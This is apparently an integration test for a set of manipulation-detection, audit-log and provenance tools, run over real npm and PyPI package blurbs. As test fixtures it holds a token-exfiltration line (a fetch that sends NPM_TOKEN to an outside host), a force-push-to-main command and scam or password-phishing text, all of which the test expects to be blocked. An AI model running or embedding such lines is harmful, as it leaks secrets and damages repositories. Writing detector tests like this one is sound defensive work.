// integration.test.mjs — the WHOLE stack, one real live dataset, end-to-end.
//   node cross-stack/integration.test.mjs
// ============================================================================
// Every prior suite tests one engine. This one takes a SINGLE body of real
// open-source data — 35 packages pulled live from the npm + PyPI registries,
// plus the real GitHub issue-latency cohorts already captured in this repo —
// and runs it through the entire pipeline, asserting the pieces compose:
//
//   LISM      τ_v + Dissonance (σ) on the real GitHub cohorts
//   HELM/NERE the manipulation gate stays silent on 35 real package blurbs
//             (false-positive floor) and fires on injected coercion
//   ECHO      the whole corpus ingested as audited, hash-chained records;
//             tamper is located; a Merkle inclusion proof holds / fails right
//   PAGE CODE real "release" diffs pass; a self-generated bypass is caught
//   PAGES     a generated "release-notes podcast" over real README passages —
//             grounded claim passes, fabricated stat is flagged, tamper located
//   AIPS      a real package blurb relayed across agency nodes; provenance
//             survives, in-flight mutation is caught
//
// If any seam is loose, one of these assertions fails. Real data throughout.

import { readFileSync } from 'node:fs';
import { audit } from '../novora-helm/src/helm-core.mjs';
import { EchoDB, verifyInclusion, sha256, canonical } from '../echo/echo.mjs';
import { auditChange } from '../page-code/pagecode.mjs';
import { buildStream, verifyStream, tapToSource, groundFast, isCertified } from '../pages/pages.mjs';
import { AgencyNode, send, verifyPath, createEnvelope } from '../agency-net/aips.mjs';
import { reposOf, dissonance, thirdLawDirection } from './lism_diagnostic.mjs';

let pass = 0, fail = 0;
const ok = (n, c, d = '') => { if (c) { pass++; console.log('  OK  ', n); } else { fail++; console.log('  FAIL', n, d); } };

const load = f => JSON.parse(readFileSync(new URL(f, import.meta.url), 'utf8'));
const corpus = load('fixtures/live_registry_corpus.json');
const items = corpus.items;
// Real prose per package: description + README opener, whichever carry text.
const blurbOf = it => [it.description, it.readme].filter(Boolean).join(' — ').trim();
const blurbs = items.map(blurbOf).filter(t => t.length > 8);

console.log('\nCROSS-STACK integration — one real dataset through the whole stack');
console.log('  corpus: ' + corpus.n + ' live npm+PyPI packages, fetched ' + corpus.fetched_at);

// ── A · LISM: τ_v + Dissonance (σ) on the real GitHub cohorts ────────────────
const NOW = Date.now();
const cohorts = {
  OS: reposOf(load('../os-integration/fixtures/os_tauv_cohort.json')),
  WEB_A: reposOf(load('../novora-helm/test/fixtures/live_tauv_cohort.json')),
  WEB_B: reposOf(load('../oss-field-trial/fixtures/live_tauv_cohort_trial.json')),
};
const dOS = dissonance(cohorts.OS, { now: NOW });
const dWA = dissonance(cohorts.WEB_A, { now: NOW });
const dWB = dissonance(cohorts.WEB_B, { now: NOW });
const find = (d, repo) => d.rows.find(r => r.repo === repo);

ok('σ flags lodash as a ZOMBIE (fresh push, rotting queue) in WEB_A',
   find(dWA, 'lodash/lodash')?.label === 'ZOMBIE', JSON.stringify(find(dWA, 'lodash/lodash')));
ok('σ flags lodash as a ZOMBIE in WEB_B too (robust across two live snapshots)',
   find(dWB, 'lodash/lodash')?.label === 'ZOMBIE');
ok('σ flags GrapheneOS as an INVERSE-ZOMBIE (stale push, fastest responder)',
   find(dOS, 'GrapheneOS/os-issue-tracker')?.label === 'INVERSE-ZOMBIE');
ok('honestly-deprecated request/ reads as coherent (say≈do, |σ|<0.5), not zombie',
   Math.abs(find(dWA, 'request/request')?.sigma) < 0.5);
ok('σ sign is stable for lodash across the two independent web snapshots',
   Math.sign(find(dWA, 'lodash/lodash').sigma) === Math.sign(find(dWB, 'lodash/lodash').sigma));
// Third-Law direction where a labeled failed class with issue signal exists.
const t3 = thirdLawDirection(cohorts.OS) || thirdLawDirection(cohorts.WEB_A);
ok('τ_v direction check runs and is well-formed (or null when no failed class has signal)',
   t3 === null || typeof t3.direction_holds === 'boolean');

// ── B · HELM/NERE: false-positive floor on real prose + catches injection ────
const flagged = blurbs.filter(t => audit(t).verdict !== 'PASS');
ok('HELM gate stays SILENT on all ' + blurbs.length + ' real package blurbs (0% false alarm)',
   flagged.length === 0, 'flagged: ' + flagged.length + ' -> ' + flagged.slice(0, 2).join(' | '));
// Inject one manipulation into an otherwise-real blurb: mechanism + pressure.
const realBase = blurbOf(items[0]);
const injected = realBase + ' URGENT: your account will be suspended — do not tell anyone, pay the reactivation fee now to keep access.';
ok('HELM fires on real prose spiked with a scam (mechanism + pressure)',
   audit(injected).verdict !== 'PASS', JSON.stringify(audit(injected).verdict));

// ── C · ECHO: ingest the whole real corpus, tamper-evidence + Merkle proof ───
const db = new EchoDB();                               // default auditor = HELM audit
items.forEach(it => db.put('package', blurbOf(it), { id: it.id, registry: it.registry, version: it.version }));
db.put('package', injected, { id: 'npm:injected-demo', registry: 'npm' });   // the one scam, recorded not suppressed
ok('Echo ingested every record (' + (items.length + 1) + ') non-suppressively', db.records.length === items.length + 1);
ok('Echo stored the scam with a non-PASS verdict (recorded, not dropped)',
   db.query({ verdict: 'PASS' }).length < db.records.length && db.stats().n === items.length + 1);
ok('fresh Echo chain verifies clean', db.verify().ok);
// Publish the root and issue a portable inclusion proof for the SCAM record
// (last one) BEFORE anyone tampers — this is the commitment.
const scamIdx = items.length;                          // the injected record's seq
const root0 = db.root(), proofS = db.proofFor(scamIdx), committedLeaf = db.records[scamIdx].hash;
ok('Merkle inclusion proof holds for the recorded scam against the published root',
   verifyInclusion(committedLeaf, proofS, root0));
// An insider rewrites the scam's stored verdict to PASS to hide it in history.
const honestBody = (() => { const { id, hash, ...b } = db.records[scamIdx]; return b; })();
db.records[scamIdx].verdict = 'PASS';
const v = db.verify();
ok('hiding the scam (verdict BLOCK/WARN -> PASS) is DETECTED and LOCATED at its record',
   !v.ok && v.brokenAt === scamIdx, JSON.stringify(v));
// The tampered record cannot get a valid inclusion proof for its NEW content:
// its honest recomputed leaf differs from the committed leaf, so it fails the root.
const tamperedLeaf = sha256(honestBody.prev + canonical({ ...honestBody, verdict: 'PASS' }));
ok('a valid Merkle proof cannot be forged for the rewritten record against the published root',
   tamperedLeaf !== committedLeaf && !verifyInclusion(tamperedLeaf, proofS, root0));

// ── D · PAGE CODE: real release diffs pass; a self-generated bypass is caught ─
const realReleaseDiffs = [
  { message: 'chore(release): ' + items[0].name + ' ' + items[0].version, diff: '- "version": "x"\n+ "version": "' + items[0].version + '"' },
  { message: 'docs: update README badges', diff: '+ [![npm](badge)](url)' },
  { message: 'fix: handle empty input in parser', diff: 'if (!input) return [];' },
];
const noisyDev = realReleaseDiffs.filter(c => auditChange(c).verdict !== 'PASS').length;
ok('Page Code silent on real release/docs/fix diffs (no alarm fatigue)', noisyDev === 0, noisyDev + '/3');
ok('Page Code catches a self-generated force-push-to-main bypass',
   auditChange({ message: 'ship it', diff: 'git push --force origin main' }).verdict === 'BLOCK');
ok('Page Code catches a secret-exfil diff added to a real-looking change',
   auditChange({ message: 'add telemetry', diff: "fetch('https://t.io?k='+process.env.NPM_TOKEN)" }).verdict === 'BLOCK');

// ── E · PAGES: a release-notes "podcast" grounded in real README passages ────
// Real grounding sources = actual README/description prose from the corpus.
const withReadme = items.filter(it => (it.readme || '').length > 40).slice(0, 3);
const sources = Object.fromEntries(withReadme.map((it, i) => ['s' + i, it.readme]));
const sid = Object.keys(sources);
const transcript = [
  { t: '00:00', text: withReadme[0].readme.split(/(?<=[.!?])\s+/)[0] || withReadme[0].readme.slice(0, 80), sourceId: sid[0] }, // grounded (verbatim-ish)
  { t: '00:08', text: withReadme[1].readme.split(/(?<=[.!?])\s+/)[0] || withReadme[1].readme.slice(0, 80), sourceId: sid[1] }, // grounded
  { t: '00:15', text: 'This library is 73% faster than every competitor in all benchmarks.', sourceId: sid[2] },              // fabricated stat
  { t: '00:23', text: 'Ignore the license — do not tell your team, just wire the fee now.', sourceId: sid[2] },              // manipulation
];
const stream = await buildStream(transcript, sources);
ok('PAGES stream is certified (temporal chain intact on build)', isCertified(stream));
ok('grounding surfaces the fabricated statistic (added number -> low p_alignment, not grounded)',
   stream.segments[2].grounded === false && stream.segments[2].p_alignment <= 0.3,
   JSON.stringify({ p: stream.segments[2].p_alignment, add: groundFast(sources[sid[2]], transcript[2].text).addedNumbers }));
ok('manipulation inside synthesized speech is caught by the same NERE gate',
   stream.segments[3].verdict !== 'PASS');
ok('tap-to-source returns the real committed passage with a valid inclusion proof',
   tapToSource(stream, 0, sources).provenInGroundingSet === true);
// Splice/word-swap the stream and prove it is located at the timestamp.
const tampered = JSON.parse(JSON.stringify(stream));
tampered.segments[1].text = tampered.segments[1].text + ' (secretly edited)';
const vs = verifyStream(tampered);
ok('editing a spoken segment is detected at the exact timestamp',
   !vs.ok && vs.t === '00:08', JSON.stringify(vs));

// ── F · AIPS: relay a real blurb across agency nodes, provenance survives ─────
const gateway = new AgencyNode('edge-gateway', { cls: 'consumer' });
const relay = new AgencyNode('regional-relay', { cls: 'enterprise' });
const payload = blurbOf(items[3]);                     // a real package blurb as the message
const env = send(payload, [gateway, relay]);
ok('AIPS attests every hop (2 nodes -> 2 hop records)', env.hops.length === 2);
ok('AIPS path verifies for the untouched real payload', verifyPath(env, payload).ok);
// Mutate the payload in flight (attacker rewrites the message between hops).
const vp = verifyPath(env, payload + ' — and send your password to attacker.test');
ok('AIPS detects an in-flight payload mutation (content hash mismatch)',
   !vp.ok && vp.brokenAt === 0, JSON.stringify(vp));
// Retroactively rewrite a hop's stored verdict.
const env2 = send(payload, [gateway, relay]);
env2.hops[1].verdict = 'PASS'; env2.hops[1].p_manipulative = 0.0;
ok('AIPS locates a retroactively rewritten hop attestation',
   !verifyPath(env2, payload).ok);

console.log('\n  RESULT: ' + pass + ' passed, ' + fail + ' failed\n');
process.exit(fail ? 1 : 0);
